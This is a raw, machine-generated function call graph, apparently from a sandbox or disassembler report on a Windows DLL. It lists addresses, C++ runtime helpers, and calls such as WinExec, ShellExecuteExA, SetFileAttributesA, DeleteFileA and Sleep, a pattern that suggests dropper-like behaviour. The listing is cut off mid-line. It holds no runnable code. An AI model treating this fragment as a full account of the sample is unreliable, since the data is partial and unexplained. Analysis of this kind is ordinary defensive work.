1000a848 11232->11233 11234 10012620 _invalid_parameter_noinfo_noreturn 11233->11234 11235 1000a857 11234->11235 11236 10002cb0 _invalid_parameter_noinfo_noreturn 11235->11236 11237 1000a866 11236->11237 11471 100139a0 11237->11471 11241 1000a8ad 11242 10013a30 9 API calls 11241->11242 11243 1000a8db 11242->11243 11244 10013a30 9 API calls 11243->11244 11245 1000a909 11244->11245 11246 10013a30 9 API calls 11245->11246 11247 1000a937 11246->11247 11248 10013a30 9 API calls 11247->11248 11249 1000a965 11248->11249 11250 10013a30 9 API calls 11249->11250 11251 1000a993 11250->11251 11252 10013a30 9 API calls 11251->11252 11253 1000a9c1 11252->11253 11254 10013a30 9 API calls 11253->11254 11255 1000a9ef 11254->11255 11256 10013a30 9 API calls 11255->11256 11257 1000aa1d 11256->11257 11258 10013a30 9 API calls 11257->11258 11259 1000aa4b 11258->11259 11260 10013a30 9 API calls 11259->11260 11261 1000aa79 11260->11261 11262 10002cb0 _invalid_parameter_noinfo_noreturn 11261->11262 11263 1000aa8b 11262->11263 11264 10002cb0 _invalid_parameter_noinfo_noreturn 11263->11264 11265 1000aa9a 11264->11265 11266 10002cb0 _invalid_parameter_noinfo_noreturn 11265->11266 11267 1000aaa9 11266->11267 11268 10002cb0 _invalid_parameter_noinfo_noreturn 11267->11268 11269 1000aab8 11268->11269 11270 10002cb0 _invalid_parameter_noinfo_noreturn 11269->11270 11271 1000aac7 11270->11271 11272 10002cb0 _invalid_parameter_noinfo_noreturn 11271->11272 11273 1000aad6 11272->11273 11274 10002cb0 _invalid_parameter_noinfo_noreturn 11273->11274 11275 1000aae5 11274->11275 11276 10002cb0 _invalid_parameter_noinfo_noreturn 11275->11276 11277 1000aaf4 11276->11277 11278 10002cb0 _invalid_parameter_noinfo_noreturn 11277->11278 11279 1000ab03 11278->11279 11280 10002cb0 _invalid_parameter_noinfo_noreturn 11279->11280 11281 1000ab12 11280->11281 11282 10002cb0 _invalid_parameter_noinfo_noreturn 11281->11282 11283 1000ab21 11282->11283 11284 10005520 DeleteFileA 11283->11284 11285 1000ab33 11284->11285 11286 10002da0 8 API calls 11285->11286 11287 1000ab4d 11286->11287 11288 10005300 31 API calls 11287->11288 11289 1000ab64 11288->11289 11290 10002cb0 _invalid_parameter_noinfo_noreturn 11289->11290 11291 1000ab76 Sleep 11290->11291 11292 1000ab8e _Smanip _Error_objects 11291->11292 11293 10012640 9 API calls 11292->11293 11294 1000addd 11293->11294 11295 10005400 9 API calls 11294->11295 11296 1000adf4 _Smanip _Error_objects 11295->11296 11297 10012640 9 API calls 11296->11297 11298 1000ae9a 11297->11298 11299 10005400 9 API calls 11298->11299 11300 1000aeb1 11299->11300 11301 10013890 9 API calls 11300->11301 11302 1000aef0 11301->11302 11303 10002cb0 _invalid_parameter_noinfo_noreturn 11302->11303 11304 1000af02 11303->11304 11305 10012620 _invalid_parameter_noinfo_noreturn 11304->11305 11306 1000af11 11305->11306 11307 10002cb0 _invalid_parameter_noinfo_noreturn 11306->11307 11308 1000af20 11307->11308 11309 10012620 _invalid_parameter_noinfo_noreturn 11308->11309 11310 1000af2f 11309->11310 11311 1000af3d WinExec Sleep 11310->11311 11312 1000af5b _Smanip _Error_objects 11311->11312 11313 10012640 9 API calls 11312->11313 11314 1000b07c 11313->11314 11315 10005400 9 API calls 11314->11315 11316 1000b093 11315->11316 11317 10012620 _invalid_parameter_noinfo_noreturn 11316->11317 11318 1000b0a5 _Smanip _Error_objects 11317->11318 11319 10012640 9 API calls 11318->11319 11320 1000b118 11319->11320 11321 10005400 9 API calls 11320->11321 11322 1000b12f 11321->11322 11323 10003bc0 10 API calls 11322->11323 11324 1000b162 11323->11324 11325 10003b90 10 API calls 11324->11325 11326 1000b1a1 11325->11326 11327 10002cd0 _invalid_parameter_noinfo_noreturn 11326->11327 11328 1000b1bc 11327->11328 11329 10002cb0 _invalid_parameter_noinfo_noreturn 11328->11329 11330 1000b1c7 11329->11330 11331 10002cb0 _invalid_parameter_noinfo_noreturn 11330->11331 11332 1000b1d6 11331->11332 11333 10002cb0 _invalid_parameter_noinfo_noreturn 11332->11333 11334 1000b1e5 11333->11334 11335 10012620 _invalid_parameter_noinfo_noreturn 11334->11335 11336 1000b1f4 memset 11335->11336 11337 10002b60 11336->11337 11338 1000b245 ShellExecuteExA 11337->11338 11339 1000b270 11338->11339 11340 1000b29b 11338->11340 11342 1000b296 11339->11342 11343 1000b279 WaitForSingleObject CloseHandle 11339->11343 11341 10002cb0 _invalid_parameter_noinfo_noreturn 11340->11341 11345 1000b2b4 11341->11345 11344 1000b3a3 Sleep 11342->11344 11399 1000b548 11342->11399 11343->11342 11346 1000b3ba 11344->11346 11347 10002cb0 _invalid_parameter_noinfo_noreturn 11345->11347 11349 10002da0 8 API calls 11346->11349 11348 1000b2c3 11347->11348 11350 10002cb0 _invalid_parameter_noinfo_noreturn 11348->11350 11351 1000b3c6 11349->11351 11352 1000b2d2 11350->11352 11480 10005740 11351->11480 11354 10002cb0 _invalid_parameter_noinfo_noreturn 11352->11354 11356 1000b2e1 11354->11356 11355 1000b3d6 11357 10002cb0 _invalid_parameter_noinfo_noreturn 11355->11357 11358 10002cb0 _invalid_parameter_noinfo_noreturn 11356->11358 11359 1000b3e8 11357->11359 11360 1000b2f0 11358->11360 11364 10002da0 8 API calls 11359->11364 11361 10002cb0 _invalid_parameter_noinfo_noreturn 11360->11361 11362 1000b2ff 11361->11362 11363 10002cb0 _invalid_parameter_noinfo_noreturn 11362->11363 11365 1000b30e 11363->11365 11366 1000b400 11364->11366 11367 10002cb0 _invalid_parameter_noinfo_noreturn 11365->11367 11368 10005740 SetFileAttributesA 11366->11368 11369 1000b31d 11367->11369 11370 1000b410 11368->11370 11372 10002cb0 _invalid_parameter_noinfo_noreturn 11369->11372 11371 10002cb0 _invalid_parameter_noinfo_noreturn 11370->11371 11373 1000b422 11371->11373 11374 1000b32c 11372->11374 11377 10005520 DeleteFileA 11373->11377 11375 10002cb0 _invalid_parameter_noinfo_noreturn 11374->11375 11376 1000b33b 11375->11376 11378 10002cb0 _invalid_parameter_noinfo_noreturn 11376->11378 11379 1000b434 11377->11379 11380 1000b34a 11378->11380 11383 10005520 DeleteFileA 11379->11383 11381 10002cb0 _invalid_parameter_noinfo_noreturn 11380->11381 11382 1000b359 11381->11382 11384 10012620 _invalid_parameter_noinfo_noreturn 11382->11384 11385 1000b448 11383->11385 11386 1000b368 11384->11386 11387 10002cb0 _invalid_parameter_noinfo_noreturn 11385->11387 11388 10012620 _invalid_parameter_noinfo_noreturn 11386->11388 11389 1000b464 11387->11389 11390 1000b377 11388->11390 11392 10002cb0 _invalid_parameter_noinfo_noreturn 11389->11392 11391 10002cb0 _invalid_parameter_noinfo_noreturn 11390->11391 11393 1000b386 11391->11393 11394 1000b473 11392->11394 11395 10002cb0 _invalid_parameter_noinfo_noreturn 11393->11395 11396 10002cb0 _invalid_parameter_noinfo_noreturn 11394->11396 11395->11342 11397 1000b482 11396->11397 11398 10002cb0 _invalid_parameter_noinfo_noreturn 11397->11398 11400 1000b491 11398->11400 11401 10002cb0 _invalid_parameter_noinfo_noreturn 11400->11401 11402 1000b4a0 11401->11402 11403 10002cb0 _invalid_parameter_noinfo_noreturn 11402->11403 11404 1000b4af 11403->11404 11405 10002cb0 _invalid_parameter_noinfo_noreturn 11404->11405 11406 1000b4be 11405->11406 11407 10002cb0 _invalid_parameter_noinfo_noreturn 11406->11407 11408 1000b4cd 11407->11408 11409 10002cb0 _invalid_parameter_noinfo_noreturn 11408->11409 11410 1000b4dc 11409->11410 11411 10002cb0 _invalid_parameter_noinfo_noreturn 11410->11411 11412 1000b4eb 11411->11412 11413 10002cb0 _invalid_parameter_noinfo_noreturn 11412->11413 11414 1000b4fa 11413->11414 11415 10002cb0 _invalid_parameter_noinfo_noreturn 11414->11415 11416 1000b509 11415->11416 11417 10012620 _invalid_parameter_noinfo_noreturn 11416->11417 11418 1000b518 11417->11418 11419 10012620 _invalid_parameter_noinfo_noreturn 11418->11419 11420 1000b527 11419->11420 11421 10002cb0 _invalid_parameter_noinfo_noreturn 11420->11421 11422 1000b536 11421->11422 11423 10002cb0 _invalid_parameter_noinfo_noreturn 11422->11423 11423->11399 11425 1000500a 11424->11425 11483 100125c0 11425->11483 11428 10005028 11430 100050db _Error_objects 11428->11430 11499 10012600 11428->11499 11489 100137c0 11430->11489 11431 100050f7 11434 10012600 9 API calls 11431->11434 11432 1000512c 11435 10012600 9 API calls 11432->11435 11434->11430 11437 1000515c 11435->11437 11436 100051dd 11493 10004ee0 MultiByteToWideChar 11436->11493 11438 10012600 9 API calls 11437->11438 11439 1000518a 11438->11439 11441 100051ef 11442 10002da0 8 API calls 11441->11442 11443 10005201 _MallocaArrayHolder 11442->11443 11444 10002cb0 _invalid_parameter_noinfo_noreturn 11443->11444 11445 1000522b 11444->11445 11446 10012620 _invalid_parameter_noinfo_noreturn 11445->11446 11447 1000523a 11446->11447 11447->11160 11449 10005280 11448->11449 11451 100052c2 11449->11451 11561 10012780 11449->11561 11565 100129e0 11449->11565 11452 10002cb0 _invalid_parameter_noinfo_noreturn 11451->11452 11454 100052e6 11452->11454 11454->11182 11626 100143c0 11455->11626 11457 100138e9 11457->11188 11459 10005531 11458->11459 11459->11194 11669 100124a0 11460->11669 11463 100053a7 11678 100053d0 11463->11678 11465 100053b9 11465->11199 11466 10005357 11467 1000536f ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 11466->11467 11673 10012400 11467->11673 11469 10005395 11470 1000539f SetFileAttributesA 11469->11470 11470->11463 11472 100139b5 HandleT Concurrency::task_continuation_context::task_continuation_context 11471->11472 11473 100139e5 11472->11473 11772 10001410 ?_Xlength_error@std@@YAXPBD 11472->11772 11764 100146c0 11473->11764 11476 1000a87f 11477 10013a30 11476->11477 11478 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 11477->11478 11479 10013a48 11478->11479 11479->11241 11481 10002b60 11480->11481 11482 10005750 SetFileAttributesA 11481->11482 11482->11355 11484 100125cf 11483->11484 11485 100125e6 11484->11485 11488 100125f3 11484->11488 11502 10013090 ?_Xlength_error@std@@YAXPBD 11484->11502 11503 10013b70 11485->11503 11488->11428 11490 100137f5 HandleT 11489->11490 11492 10013832 _Error_objects 11490->11492 11519 10014ab0 11490->11519 11492->11436 11540 10016360 11493->11540 11495 10004f1b memset MultiByteToWideChar WideCharToMultiByte 11496 10016360 11495->11496 11497 10004f7e memset WideCharToMultiByte 11496->11497 11498 10004fc2 _MallocaArrayHolder 11497->11498 11498->11441 11541 10013c60 11499->11541 11501 100050c9 11501->11430 11501->11431 11501->11432 11502->11485 11504 10013b9d Concurrency::task_continuation_context::task_continuation_context 11503->11504 11505 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11504->11505 11506 10013bcf 11505->11506 11511 10014bd0 11506->11511 11512 10014bf4 HandleT 11511->11512 11513 100152a0 memcpy 11512->11513 11514 10013bf5 11513->11514 11515 100142f0 11514->11515 11517 10014301 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11515->11517 11516 10013c42 11516->11488 11517->11516 11518 10003a90 allocator _invalid_parameter_noinfo_noreturn 11517->11518 11518->11516 11520 10014adc Concurrency::task_continuation_context::task_continuation_context 11519->11520 11523 10014b1c Concurrency::task_continuation_context::task_continuation_context 11520->11523 11529 10001410 ?_Xlength_error@std@@YAXPBD 11520->11529 11522 10014b3f Concurrency::task_continuation_context::task_continuation_context 11530 10015250 11522->11530 11523->11522 11525 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11523->11525 11525->11522 11526 10014b8b _Error_objects 11533 100151a0 11526->11533 11529->11523 11537 100153c0 11530->11537 11534 10014bbe 11533->11534 11535 100151af 11533->11535 11534->11492 11536 10003230 _invalid_parameter_noinfo_noreturn 11535->11536 11536->11534 11538 100152a0 memcpy 11537->11538 11539 10015264 11538->11539 11539->11526 11542 10013c93 11541->11542 11544 10013c85 11541->11544 11545 10014d00 11542->11545 11544->11501 11546 10014d2d Concurrency::task_continuation_context::task_continuation_context 11545->11546 11547 10014d6f 11546->11547 11560 10013090 ?_Xlength_error@std@@YAXPBD 11546->11560 11549 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11547->11549 11550 10014d95 HandleT 11549->11550 11551 10014e06 11550->11551 11552 10014de8 11550->11552 11554 10014bd0 memcpy 11551->11554 11553 10014bd0 memcpy 11552->11553 11557 10014e01 11553->11557 11555 10014e1d 11554->11555 11556 10014bd0 memcpy 11555->11556 11556->11557 11558 100142f0 _invalid_parameter_noinfo_noreturn 11557->11558 11559 10014ea1 11558->11559 11559->11544 11560->11547 11562 1001279a Concurrency::task_continuation_context::task_continuation_context 11561->11562 11569 10013e30 11562->11569 11566 100129fa Concurrency::task_continuation_context::task_continuation_context 11565->11566 11576 10013280 11566->11576 11571 10013e3e 11569->11571 11573 100127ca 11569->11573 11571->11573 11574 100049b0 memchr 11571->11574 11575 100049e0 memcmp 11571->11575 11573->11449 11574->11571 11575->11571 11577 10003980 ?_Xout_of_range@std@@YAXPBD 11576->11577 11578 1001329b 11577->11578 11579 100132e0 11578->11579 11580 100132bc Concurrency::task_continuation_context::task_continuation_context 11578->11580 11581 10013361 11579->11581 11582 10013300 Concurrency::task_continuation_context::task_continuation_context 11579->11582 11596 100039e0 memcpy 11580->11596 11583 1001342d 11581->11583 11590 1001337c Concurrency::task_continuation_context::task_continuation_context 11581->11590 11597 100039e0 memcpy 11582->11597 11602 10014100 11583->11602 11587 10013325 11598 100039e0 memcpy 11587->11598 11599 100039e0 memcpy 11590->11599 11591 100133f1 11600 100039e0 memcpy 11591->11600 11593 10013405 11601 100036d0 memcpy 11593->11601 11595 10012a15 11595->11449 11596->11595 11597->11587 11598->11595 11599->11591 11600->11593 11601->11595 11603 10014120 Concurrency::task_continuation_context::task_continuation_context 11602->11603 11605 1001412d Concurrency::task_continuation_context::task_continuation_context 11603->11605 11615 10001410 ?_Xlength_error@std@@YAXPBD 11603->11615 11606 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11605->11606 11607 10014167 HandleT _Error_objects 11606->11607 11608 1001419c HandleT 11607->11608 11609 100141ef 11607->11609 11616 10013460 11608->11616 11610 10013460 memcpy 11609->11610 11614 100141e2 Concurrency::task_continuation_context::task_continuation_context 11610->11614 11613 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11613->11614 11614->11595 11615->11605 11623 100036d0 memcpy 11616->11623 11618 10013478 11624 100036d0 memcpy 11618->11624 11620 1001348f 11625 100036d0 memcpy 11620->11625 11622 100134b8 11622->11613 11623->11618 11624->11620 11625->11622 11627 100143da Concurrency::task_continuation_context::task_continuation_context 11626->11627 11630 100148c0 11627->11630 11631 10003980 ?_Xout_of_range@std@@YAXPBD 11630->11631 11632 100148db 11631->11632 11633 100149bc 11632->11633 11636 1001490e Concurrency::task_continuation_context::task_continuation_context 11632->11636 11645 10014ff0 11633->11645 11635 100143f1 11635->11457 11642 100039e0 memcpy 11636->11642 11638 10014980 11643 100036d0 memcpy 11638->11643 11640 10014994 11644 100036d0 memcpy 11640->11644 11642->11638 11643->11640 11644->11635 11646 10015010 Concurrency::task_continuation_context::task_continuation_context 11645->11646 11648 1001501d Concurrency::task_continuation_context::task_continuation_context 11646->11648 11658 10001410 ?_Xlength_error@std@@YAXPBD 11646->11658 11649 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11648->11649 11650 10015057 HandleT _Error_objects 11649->11650 11651 100150db 11650->11651 11652 1001508c HandleT 11650->11652 11653 100149f0 memcpy 11651->11653 11659 100149f0 11652->11659 11655 100150ce Concurrency::task_continuation_context::task_continuation_context 11653->11655 11655->11635 11657 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11657->11655 11658->11648 11666 100036d0 memcpy 11659->11666 11661 10014a08 11667 100036d0 memcpy 11661->11667 11663 10014a1f 11668 100036d0 memcpy 11663->11668 11665 10014a42 11665->11657 11666->11661 11667->11663 11668->11665 11670 100124bb 11669->11670 11681 10012f80 11670->11681 11734 10012f10 11673->11734 11676 10012434 11676->11469 11677 10012418 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11677->11676 11754 10012440 11678->11754 11680 100053e2 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 11680->11465 11682 10012fd0 HandleT 11681->11682 11683 10012fab ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 11681->11683 11684 10012fe0 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 11682->11684 11683->11682 11691 10013680 ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 11684->11691 11688 1001304f 11689 10013053 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11688->11689 11690 10005333 ??Bios_base@std@ 11688->11690 11689->11690 11690->11463 11690->11466 11703 10012e40 11691->11703 11694 100135c0 11695 100135e7 11694->11695 11696 100135eb ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 11694->11696 11695->11688 11696->11695 11697 1001360d 11696->11697 11698 10012e40 3 API calls 11697->11698 11699 1001361b ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 11698->11699 11709 10013a70 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 11699->11709 11701 10013642 11719 10012cd0 ?always_noconv@codecvt_base@std@ 11701->11719 11704 10012e4f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11703->11704 11706 10012e7f 11704->11706 11707 10012ede 11704->11707 11706->11707 11708 10012e88 _get_stream_buffer_pointers ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001 11706->11708 11707->11694 11708->11707 11723 10004cc0 11709->11723 11712 10013b47 ??1_Lockit@std@@QAE 11712->11701 11713 10013ad7 ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 11714 10013af5 11713->11714 11715 10013aed 11713->11715 11730 10015eef malloc 11714->11730 11727 10004c10 11715->11727 11718 10013acf 11718->11712 11720 10012cf3 HandleT 11719->11720 11721 10012ce7 11719->11721 11722 10012cfc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11720->11722 11721->11695 11722->11721 11724 10004cd7 11723->11724 11725 10004d11 ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 11724->11725 11726 10004d0c 11724->11726 11725->11726 11726->11712 11726->11713 11726->11718 11728 10004be0 std::bad_alloc::bad_alloc 11727->11728 11729 10004c1e _CxxThrowException 11728->11729 11729->11718 11731 10015f02 11730->11731 11732 10015f17 ?_Xbad_alloc@std@ 11730->11732 11731->11718 11733 10015f1d 11732->11733 11733->11718 11735 10012f22 11734->11735 11743 10012f5a 11734->11743 11744 10012c90 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11735->11744 11737 10012e40 3 API calls 11739 10012414 11737->11739 11739->11676 11739->11677 11743->11737 11745 10012cc9 11744->11745 11746 10012caa ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11744->11746 11747 10012d20 11745->11747 11746->11745 11748 10012d32 Concurrency::task_continuation_context::task_continuation_context 11747->11748 11752 10012d3d fclose 11747->11752 11749 10012d8a ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 11748->11749 11748->11752 11750 10012dbf 11749->11750 11751 10012de1 fwrite 11750->11751 11750->11752 11751->11752 11753 10012e00 11751->11753 11752->11743 11753->11752 11757 10012390 11754->11757 11756 10012482 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 11756->11680 11758 100123c6 11757->11758 11759 100123be 11757->11759 11761 100123db ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE 11758->11761 11762 10012f10 8 API calls 11758->11762 11760 10012c90 2 API calls 11759->11760 11760->11758 11761->11756 11763 100123da 11762->11763 11763->11761 11765 100146ec HandleT Concurrency::task_continuation_context::task_continuation_context 11764->11765 11766 10014782 HandleT Concurrency::task_continuation_context::task_continuation_context 11765->11766 11771 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11765->11771 11773 100036d0 memcpy 11766->11773 11768 100147ca 11774 100036d0 memcpy 11768->11774 11770 100147e1 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11770->11476 11771->11766 11772->11473 11773->11768 11774->11770 11776 1000b5a8 11775->11776 11777 10002da0 8 API calls 11776->11777 11778 1000b5be 11777->11778 12017 10005540 GetModuleFileNameA 11778->12017 11780 1000b5d1 _Smanip _Error_objects 11781 10012640 9 API calls 11780->11781 11782 1000bc37 _Smanip _Error_objects 11781->11782 11783 10012640 9 API calls 11782->11783 11784 10010552 11783->11784 11785 10005400 9 API calls 11784->11785 11786 10010569 11785->11786 11787 10005400 9 API calls 11786->11787 11788 10010583 _Error_objects 11787->11788 11789 10004fe0 17 API calls 11788->11789 11790 100105bf 11789->11790 11791 10002cd0 _invalid_parameter_noinfo_noreturn 11790->11791 11792 100105da 11791->11792 11793 10002cb0 _invalid_parameter_noinfo_noreturn 11792->11793 11794 100105e5 11793->11794 11795 10004fe0 17 API calls 11794->11795 11796 100105f9 11795->11796 11797 10002cd0 _invalid_parameter_noinfo_noreturn 11796->11797 11798 10010614 11797->11798 11799 10002cb0 _invalid_parameter_noinfo_noreturn 11798->11799 11800 1001061f 11799->11800 11801 100054b0 9 API calls 11800->11801 11802 100106e4 _Smanip _Error_objects 11801->11802 11803 10012640 9 API calls 11802->11803 11804 10010770 11803->11804 11805 10005400 9 API calls 11804->11805 11806 10010787 11805->11806 11807 10012620 _invalid_parameter_noinfo_noreturn 11806->11807 11808 10010799 11807->11808 11809 10002e20 8 API calls 11808->11809 11810 100107bf 11809->11810 11811 10005250 13 API calls 11810->11811 11812 100107cb _Smanip _Error_objects 11811->11812 11813 10012640 9 API calls 11812->11813 11814 10010881 11813->11814 11815 10005400 9 API calls 11814->11815 11816 10010898 11815->11816 11817 100138d0 11 API calls 11816->11817 11818 100108cb 11817->11818 11819 10002cb0 _invalid_parameter_noinfo_noreturn 11818->11819 11820 100108dd 11819->11820 11821 10012620 _invalid_parameter_noinfo_noreturn 11820->11821 11822 100108ec 11821->11822 11823 10005520 DeleteFileA 11822->11823 11824 100108fe 11823->11824 11825 10002da0 8 API calls 11824->11825 11826 10010918 11825->11826 11827 10005300 31 API calls 11826->11827 11828 1001092f 11827->11828 11829 10002cb0 _invalid_parameter_noinfo_noreturn 11828->11829 11830 10010941 Sleep 11829->11830 11831 10010959 11830->11831 11832 10002da0 8 API calls 11831->11832 11833 10010965 _Smanip _Error_objects 11832->11833 11834 10012640 9 API calls 11833->11834 11835 100109da 11834->11835 11836 10005400 9 API calls 11835->11836 11837 100109f1 11836->11837 11838 10002e20 8 API calls 11837->11838 11839 10010a3b 11838->11839 11840 10005250 13 API calls 11839->11840 11841 10010a47 11840->11841 11842 10002cb0 _invalid_parameter_noinfo_noreturn 11841->11842 11843 10010a5f 11842->11843 11844 10012620 _invalid_parameter_noinfo_noreturn 11843->11844 11845 10010a6e 11844->11845 11846 10002cb0 _invalid_parameter_noinfo_noreturn 11845->11846 11847 10010a7d 11846->11847 11848 10002da0 8 API calls 11847->11848 11849 10010a95 _Smanip _Error_objects 11848->11849 11850 10012640 9 API calls 11849->11850 11851 10010b0e 11850->11851 11852 10005400 9 API calls 11851->11852 11853 10010b25 11852->11853 11854 10002e20 8 API calls 11853->11854 11855 10010b6f 11854->11855 11856 10005250 13 API calls 11855->11856 11857 10010b7b 11856->11857 11858 10002cd0 _invalid_parameter_noinfo_noreturn 11857->11858 11859 10010ba2 11858->11859 11860 10002cb0 _invalid_parameter_noinfo_noreturn 11859->11860 11861 10010bad 11860->11861 11862 10002cb0 _invalid_parameter_noinfo_noreturn 11861->11862 11863 10010bbc 11862->11863 11864 10012620 _invalid_parameter_noinfo_noreturn 11863->11864 11865 10010bcb 11864->11865 11866 10002cb0 _invalid_parameter_noinfo_noreturn 11865->11866 11867 10010bda 11866->11867 11868 100139a0 8 API calls 11867->11868 11869 10010bf3 11868->11869 11870 10013a30 9 API calls 11869->11870 11871 10010c21 11870->11871 11872 10013a30 9 API calls 11871->11872 11873 10010c4f 11872->11873 11874 10013a30 9 API calls 11873->11874 11875 10010c7d 11874->11875 11876 10013a30 9 API calls 11875->11876 11877 10010cab 11876->11877 11878 10013a30 9 API calls 11877->11878 11879 10010cd9 11878->11879 11880 10013a30 9 API calls 11879->11880 11881 10010d07 11880->11881 11882 10013a30 9 API calls 11881->11882 11883 10010d35 11882->11883 11884 10013a30 9 API calls 11883->11884 11885 10010d63 11884->11885 11886 10013a30 9 API calls 11885->11886 11887 10010d91 11886->11887 11888 10013a30 9 API calls 11887->11888 11889 10010dbf 11888->11889 11890 10013a30 9 API calls 11889->11890 11891 10010ded 11890->11891 11892 10002cb0 _invalid_parameter_noinfo_noreturn 11891->11892 11893 10010dff 11892->11893 11894 10002cb0 _invalid_parameter_noinfo_noreturn 11893->11894 11895 10010e0e 11894->11895 11896 10002cb0 _invalid_parameter_noinfo_noreturn 11895->11896 11897 10010e1d 11896->11897 11898 10002cb0 _invalid_parameter_noinfo_noreturn 11897->11898 11899 10010e2c 11898->11899 11900 10002cb0 _invalid_parameter_noinfo_noreturn 11899->11900 11901 10010e3b 11900->11901 11902 10002cb0 _invalid_parameter_noinfo_noreturn 11901->11902 11903 10010e4a 11902->11903 11904 10002cb0 _invalid_parameter_noinfo_noreturn 11903->11904 11905 10010e59 11904->11905 11906 10002cb0 _invalid_parameter_noinfo_noreturn 11905->11906 11907 10010e68 11906->11907 11908 10002cb0 _invalid_parameter_noinfo_noreturn 11907->11908 11909 10010e77 11908->11909 11910 10002cb0 _invalid_parameter_noinfo_noreturn 11909->11910 11911 10010e86 11910->11911 11912 10002cb0 _invalid_parameter_noinfo_noreturn 11911->11912 11913 10010e95 11912->11913 11914 10005520 DeleteFileA 11913->11914 11915 10010ea7 11914->11915 11916 10002da0 8 API calls 11915->11916 11917 10010ec1 11916->11917 11918 10005300 31 API calls 11917->11918 11919 10010ed8 11918->11919 11920 10002cb0 _invalid_parameter_noinfo_noreturn 11919->11920 11921 10010eea Sleep 11920->11921 11922 10010f02 _Smanip _Error_objects 11921->11922 11923 10012640 9 API calls 11922->11923 11924 10011151 11923->11924 11925 10005400 9 API calls 11924->11925 11926 10011168 _Smanip _Error_objects 11925->11926 11927 10012640 9 API calls 11926->11927 11928 1001120e 11927->11928 11929 10005400 9 API calls 11928->11929 11930 10011225 11929->11930 11931 10013890 9 API calls 11930->11931 11932 10011264 11931->11932 11933 10002cb0 _invalid_parameter_noinfo_noreturn 11932->11933 11934 10011276 11933->11934 11935 10012620 _invalid_parameter_noinfo_noreturn 11934->11935 11936 10011285 11935->11936 11937 10002cb0 _invalid_parameter_noinfo_noreturn 11936->11937 11938 10011294 11937->11938 11939 10012620 _invalid_parameter_noinfo_noreturn 11938->11939 11940 100112a3 11939->11940 11941 100112b1 WinExec 11940->11941 11942 100112c4 _Smanip _Error_objects 11941->11942 11943 10012640 9 API calls 11942->11943 11944 100113fd 11943->11944 11945 10005400 9 API calls 11944->11945 11946 10011414 11945->11946 11947 10012620 _invalid_parameter_noinfo_noreturn 11946->11947 11948 10011426 _Smanip _Error_objects 11947->11948 11949 10012640 9 API calls 11948->11949 11950 100114b9 11949->11950 11951 10005400 9 API calls 11950->11951 11952 100114d0 11951->11952 11953 10003bc0 10 API calls 11952->11953 11954 10011503 11953->11954 11955 10003b90 10 API calls 11954->11955 11956 10011542 11955->11956 11957 10002cd0 _invalid_parameter_noinfo_noreturn 11956->11957 11958 1001155d 11957->11958 11959 10002cb0 _invalid_parameter_noinfo_noreturn 11958->11959 11960 10011568 11959->11960 11961 10002cb0 _invalid_parameter_noinfo_noreturn 11960->11961 11962 10011577 11961->11962 11963 10002cb0 _invalid_parameter_noinfo_noreturn 11962->11963 11964 10011586 11963->11964 11965 10012620 _invalid_parameter_noinfo_noreturn 11964->11965 11966 10011595 11965->11966 11967 100115a3 WinExec Sleep 11966->11967 11968 100115c1 11967->11968 11969 10002da0 8 API calls 11968->11969 11970 100115cd 11969->11970 11971 10005740 SetFileAttributesA 11970->11971 11972 100115dd 11971->11972 11973 10002cb0 _invalid_parameter_noinfo_noreturn 11972->11973 11974 100115ef 11973->11974 11975 10002da0 8 API calls 11974->11975 11976 10011607 11975->11976 11977 10005740 SetFileAttributesA 11976->11977 11978 10011617 11977->11978 11979 10002cb0 _invalid_parameter_noinfo_noreturn 11978->11979 11980 10011629 11979->11980 11981 10005520 DeleteFileA 11980->11981 11982 1001163b 11981->11982 11983 10005520 DeleteFileA 11982->11983 11984 1001164f 11983->11984 11985 10002cb0 _invalid_parameter_noinfo_noreturn 11984->11985 11986 1001166b 11985->11986 11987 10002cb0 _invalid_parameter_noinfo_noreturn 11986->11987 11988 1001167a 11987->11988 11989 10002cb0 _invalid_parameter_noinfo_noreturn 11988->11989 11990 10011689 11989->11990 11991 10002cb0 _invalid_parameter_noinfo_noreturn 11990->11991 11992 10011698 11991->11992 11993 10002cb0 _invalid_parameter_noinfo_noreturn 11992->11993 11994 100116a7 11993->11994 11995 10002cb0 _invalid_parameter_noinfo_noreturn 11994->11995 11996 100116b6 11995->11996 11997 10002cb0 _invalid_parameter_noinfo_noreturn 11996->11997 11998 100116c5 11997->11998 11999 10002cb0 _invalid_parameter_noinfo_noreturn 11998->11999 12000 100116d4 11999->12000 12001 10002cb0 